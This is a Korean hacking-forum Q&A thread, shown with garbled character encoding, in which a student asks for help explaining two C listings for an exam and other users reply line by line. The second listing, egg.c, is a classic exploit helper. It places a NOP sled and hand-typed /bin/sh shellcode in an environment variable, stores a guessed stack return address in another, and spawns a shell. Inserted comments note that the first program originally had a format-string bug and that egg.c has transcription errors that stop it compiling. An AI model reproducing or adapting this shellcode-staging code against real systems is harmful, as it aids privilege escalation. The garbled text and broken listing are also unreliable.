½Ã½ºÅÛ ÇØÅ·

   bluesun2
   ¼Ò½º Çؼ®Á» ºÎŹµå¸³´Ï´Ù (¾ð¾î¸¦ ¹è¿îÀûÀ̾ø¾î¼­ ½ÃÇèÀε¥..)

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_system&no=1451 [º¹»ç]


¹ö±×ÆÄÀÏ°ú ¿¡±×ÆÄÀÏ ¼Ò½ºÇؼ®Á» ºÎŹµå¸³´Ï´Ù

bugfile.c
#include <stdio.h>
#include <string.h>
#include <unistd.h>

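/*
 * Reads up to 63 bytes from stdin and echoes them back.
 *
 * As posted, the listing printed the buffer with printf(buf): the user's
 * input was used as the format string (a format-string bug), and because
 * read() was allowed to fill all 64 bytes, buf was not guaranteed to be
 * NUL-terminated before printf() walked it. Both are fixed here: one byte
 * is reserved for the terminator and the input is printed through a
 * constant "%s" format, so it is only ever treated as data.
 *
 * Returns 0 on success, 1 if read() fails.
 */
int main(void) {
    char buf[64];

    memset(buf, 0, sizeof buf);

    /* read at most 63 bytes so buf[63] stays '\0' and buf is a valid C string */
    ssize_t n = read(0, buf, sizeof buf - 1);
    if (n < 0) {
        perror("read");
        return 1;
    }

    /* constant format string; the input is an argument, never the format */
    printf("%s", buf);
    return 0;
}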

egg.c (Àå¹®ÀÔ´Ï´Ù ¼ÕÀ¸·Î Ãļ­ ¿ÀŸ°¡ÀÖÀ»¼öµµ)

#include <stdlib.h>
#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 512
#define DEFAULT_EGG_SIZE 2048
#define NOP 0x90

/*
 * Payload bytes used by egg.c: raw x86 machine code written as a C string
 * literal, ending in the text "/bin/sh". The poster says this was typed by
 * hand, so the bytes may not match any published original. Note that main()
 * measures it with strlen(), which stops at the first '\0' byte -- and the
 * last line below begins with "\x00" -- so only the bytes before that point
 * count as the payload length as far as main() is concerned.
 */
char shellcode[] =

"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80"
"\x55\x89\xe5\xeb\x1f\x5e\x89\x76\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89"
"\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89"
"\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"
"\x00\xc9\xc3\x90/bin/sh";

/*
 * Returns the caller's current stack pointer.
 *
 * The inline asm copies %esp into %eax; on 32-bit x86 %eax is the register a
 * function's integer result is returned in, so the value comes back without
 * an explicit return statement. That is a compiler/ABI convention, not a C
 * guarantee. As transcribed ("unnsigned", missing ';' and closing brace)
 * this function does not compile.
 */
unnsigned long get_esp (void) {

__asm__("movl %esp, %eax")

/*
 * egg.c entry point ("eggshell" helper, as transcribed).
 *
 * Builds two heap buffers, exports them as environment variables and then
 * starts a shell that inherits them:
 *   EGG=  eggsize bytes: a run of NOP (0x90) bytes followed by shellcode[]
 *   RET=  bsize bytes:   one guessed stack address (get_esp() - offset),
 *         stored repeatedly, 4 bytes apart
 * The program does nothing else. NOTE(review): default hardening on current
 * systems (non-executable stacks, ASLR) is designed to make this staging
 * technique non-functional; the listing is of historical/teaching interest.
 *
 * argv[1] = bsize, argv[2] = offset, argv[3] = eggsize. All go through
 * atoi(), which reports no errors: non-numeric input becomes 0 and negative
 * values are not rejected before they reach malloc() and the loops below.
 */
main (int argc, char *argv[]) {
char *buff, *ptr, *egg;
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
int i, eggsize=DEFAULT_EGG_SIZE;
if (argc > 1) bsize = atoi (argv[ 1]);
if (argc > 2) offset = atoi (argv[ 2]);
if (argc > 3) eggsize = atoi (argv[ 3]);
/* allocation failures print a message but exit with status 0 (success) */
if (!(buff = malloc(bsize))) {
printf ("can't allocate memory.\n");
exit (0);
}

if (!(egg = malloc(eggsize))) {
printf("can't allocate memory.\n");
exit (0);
}

/* the guessed address: current stack pointer minus the caller-supplied offset */
addr = get_esp() - offset;
/* NOTE(review): "%x" expects unsigned int but addr is long; this only lines
   up where sizeof(long) == sizeof(int), i.e. the 32-bit target this code
   appears to assume */
printf("using address: 0x%x\n", addr);
ptr = buff;
addr_ptr = (long *) ptr;

/* store addr into buff once per 4 bytes. Each store writes sizeof(long)
   bytes while i advances by 4, so this also assumes sizeof(long) == 4; if
   that does not hold, or bsize is not a multiple of 4, the last stores run
   past the end of buff. Transcription error on the next line (stray '_'). */
for (i = 0; i < bsize; i+=4)
*(addr_ptr++_ = addr;
ptr = egg;
/* NOP sled: strlen() returns size_t, so the bound is evaluated unsigned; if
   eggsize < strlen(shellcode) + 1 it wraps to a huge value and the loop
   writes far past egg */
for (i = 0; i < eggsize - strlen (shellcode) - 1; i++)
* (ptr++) = NOP;

/* shellcode[] is placed directly after the sled */
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[ i];
buff[bsize - 1] = '\0';
egg[ eggsize - 1] = '\0';
/* the variable names overwrite the first 4 bytes of each buffer. putenv()
   keeps the pointer itself rather than copying, so buff and egg must stay
   allocated for as long as the environment is used (they are never freed) */
memcpy (egg, "EGG=", 4);
putenv (egg);
memcpy (buff, "RET=", 4);
putenv (buff);
/* the child shell inherits EGG and RET through its environment */
system("/bin/bash");
}

  Hit : 3362     Date : 2010/12/13 05:49



    
¹Ùº¼ÀÌ À§¿¡²« °£´ÜÈ÷ ¹öÆÛ¸¦ 0À¸·Î ÃʱâÈ­ÇÑÈÄ, ÀÔ·ÂÀ» ¹Þ¾Æ¼­ ±×´ë·Î Ãâ·ÂÇÏ´Â ÇÁ·Î±×·¥À̳׿ä
Æ÷¸Ë ½ºÆ®¸µ ¹ö±×¹®Á¦Àΰ¡º¸³×¿ä

¹Ø¿¡²«
½©Äڵ带 ȯ°æº¯¼ö¿¡ ¿Ã·Á³õ°í ¶Ç ±× ȯ°æº¯¼öÀÇ ÁÖ¼Òµµ ȯ°æº¯¼ö¿¡ ¿Ã·Á³õ´Â ÇÁ·Î±×·¥ÀÔ´Ï´Ù
2010/12/17  
sweetick Áö±Ý ½Å±âÇÑ°Ç ¹è¿îÀûÀÌ ¾ø´Â°É ½ÃÇèÀ¸·Î ³»´Â Çб³°¡ ÀÖ´Ù´Â »ç½Ç. 2011/01/16  
rkdgh0112 ÀϹÝÀûÀÎ ½©ÄÚµå±äÇѵ¥..
ÀÌ°ÉÁøÂ¥ °¡¸£ÃÄÁÖÁöµµ¾Ê°í ½ÃÇè¿¡³»³ª¿ä
2011/02/11  
rkdgh0112 ½©ÄÚµå °øºÎ´Â ¾ÈÇغôµ¥
±×³É Á¦ ³ª¸§´ë·ÎÀÇ Çؼ®À» º¸¿©µå¸±²¾¿ä
½¬¿î°Ç °Ç³Ê¶Ù°í ¾à°£ Çò°¥¸®´Ù ½ÍÀº°Å³ª Áß¿äÇÑ°Å

unnsigned long get_esp (void) { // get_esp ¶ó´Â À¯ÀúÇÔ¼öÀÇ Àü¿ª¼±¾ðÀÔ´Ï´Ù.

__asm__("movl %esp, %eax") //.. %esp¿¡ %eax°ªÀ» Áִ°ɷκ¸À̳׿ä

main (int argc, char *argv[]) { //¸ÞÀÎÇÔ¼öÀÇ ¿øÇü ¼±¾ð
char *buff, *ptr, *egg; // buff, ptr,egg º¯¼öµéÀÇ charÇü Æ÷ÀÎÅÍ ¼³Á¤
char ÇüÀ¸·Î ¼³Á¤ÇÏ´ÂÀÌÀ¯ = Æ÷ÀÎÅÍ´Â ¸Þ¸ð¸®Áּұ⶧¹®¿¡ 16Áø¼öÀÇ ¼ýÀÚ¿­°ú ¹®ÀÚ¿­·Î Ç¥ÇöµÈ´Ù.
long *addr_ptr, addr; // long ÇüÀÇ addr º¯¼ö¼±¾ð°ú ±×ÀÇ Æ÷ÀÎÅÍ ¼±¾ð
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE; // offsetÀ̶ó´Â º¯¼ö¸¦ default·Î ¼³Á¤, bsize¶ó´Â º¯¼ö¸¦ default·Î ¼³Á¤
int i, eggsize=DEFAULT_EGG_SIZE; // i¶ó´Â º¯¼ö¼±¾ð°ú eggsize¼±¾ð µ¿½Ã¿¡ eggsize¸¦ default_egg_size·Î ÇÔ

¹Ø¿¡ÁÙ ÇϱâÀü¿¡,
if ¹®, else if, else¸ðµÎ ½ÇÇ๮ÀÌ ÇÑ°³ÀÏ°æ¿ì¿¡ Áß°ýÈ£¸¦ Á¦¿ÜÇÒ¼öÀÖÀ½
if (argc > 1) bsize = atoi (argv[ 1]);
if (argc > 2) offset = atoi (argv[ 2]);
if (argc > 3) eggsize = atoi (argv[ 3]);
if (!(buff = malloc(bsize))) {
printf ("can't allocate memory.\n");
exit (0);
}
Áï ÀÌ°Ç ÀÔ·ÂÇÑ ÀÎÀÚÀÇ °³¼ö°¡ °¢°¢ 1°³, 2°³, 3°³À϶§ ÀÇ »óȲµéÀ» ÁßøÇØ »ç¿ëÇÑ°ÍÀÔ´Ï´Ù.
°á±¹ ÀÔ·ÂÇÑ ÀÎÀÚÀÇ °³¼ö°¡ 1ÀÌ»óÀ̸é 2°³ÀÌ»óÀÎÁöº¸°í 3°³ÀÌ»óÀÎÁöºÁ¼­
¸¶Áö¸·¿¡ malloc(bsize)
Áï bsize¿¡ ÇÒ´çµÈ ¸Þ¸ð¸®½ºÅðú buffÀÇ °ªÀÌ °°Áö¾ÊÀ»°æ¿ì,
can't allocate momory ¶ó´Â ¿¡·¯¹®ÀÌ ¹ß»ýÇϵµ·Ï ÇسõÀº°ÍÀÌÁÒ.
±×¸®°í ÇÔ¼öÀdz¡¿¡¼± 0À»¹ÝȯÇÕ´Ï´Ù.

if (!(egg = malloc(eggsize))) {
printf("can't allocate memory.\n");
exit (0);
}
¶ÇÇÑ egg°¡ eggsize¿¡ ÇÒ´çµÈ ½ºÅÃ¸Þ¸ð¸®¿Í °°Áö¾ÊÀ¸¸é
À§ÀÇ ¿¡·¯¹®ÀÌ ¶Ç ³ª¿À±¸¿ä.

addr = get_esp() - offset;
printf("using address: 0x%x\n", addr);
ptr = buff;
addr_ptr = (long *) ptr;


for (i = 0; i < bsize; i+=4)
*(addr_ptr++_ = addr;
ptr = egg;
for (i = 0; i < eggsize - strlen (shellcode) - 1; i++)
* (ptr++) = NOP;

for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[ i];
buff[bsize - 1] = '\0';
egg[ eggsize - 1] = '\0';
memcpy (egg, "EGG=", 4);
putenv (egg);
memcpy (buff, "RET=", 4);
putenv (buff);
system("/bin/bash");
}
2011/02/11  
rkdgh0112 addr = get_esp() - offset
ºÎºÐºÎÅÍ´Â ³»ÀÏÀÛ¼ºÇÒ²¾¿ä..
¾ö¸¶°¡ ÀÚ¶ó°í ¼ºÈ­¿¡¿ä ¤»¤»..

Ʋ¸°°ÅÀÖÀ¸¸é ¹«Á¶°Ç ÁöÀûÇØÁֽñ¸¿ä


°á±¹ ÇÁ·Î±×·¥ÀÇ Á¾ÂøÁ¡Àº ½© ½ÇÇàÀÔ´Ï´Ù.
2011/02/11  
